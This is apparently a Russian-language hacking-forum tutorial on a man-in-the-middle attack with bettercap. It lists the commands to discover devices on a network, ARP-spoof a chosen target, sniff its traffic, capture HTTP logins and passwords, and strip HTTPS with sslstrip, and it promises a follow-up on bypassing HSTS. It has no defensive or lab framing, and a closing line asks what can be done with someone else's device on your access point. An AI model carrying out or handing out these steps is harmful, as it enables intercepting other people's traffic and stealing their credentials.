Подготовка Всем привет, сегодня устроим митм через bettercap. Часть2 - https://zelenka.guru/threads/2518705/ Атака «человек посередине» (MITM) происходит, когда кто-то сидит между двумя компьютерами (например, ноутбуком и удаленным сервером) и перехватывает трафик. Этот человек может подслушивать или даже перехватывать связь между двумя машинами и красть информацию. Вводим iwconfig для просмотра сетевых интерфейсов. Теперь запустим сам инструмент: sudo bettercap -iface (интерфейс) Bettercap это инструмент с большим функционалом, про различные плагины можете почитать на других сайтах. Поиск цели Просмотрим устройства подключенные к сети: net.probe onnet.show Начинаем атаковать arp.spoof on set arp.spoof.targets (устройство) net.sniff on Теперь видим, что у нас пролетают пакеты по сети: Зайдём на сайт с протоколом передачи http и залогинимся: Пошли http пакеты Видим логин и пароль Sslstrip Сейчас то время, когда уже почти все сайты на https, летс турн он sslstrip: https.proxy on set https.proxy.sslstrip true Сайт на https Но ещё часть таких сайтов юзают защиту HSTS (HTTP Strict Transport Security). Про то, как его обойти проговорим в следующей статье Ее я напишу, если вам понравиться. Всем спасибо
opostal, что можно сделать с устройством другого человека, когда он подключится к вашей точке доступа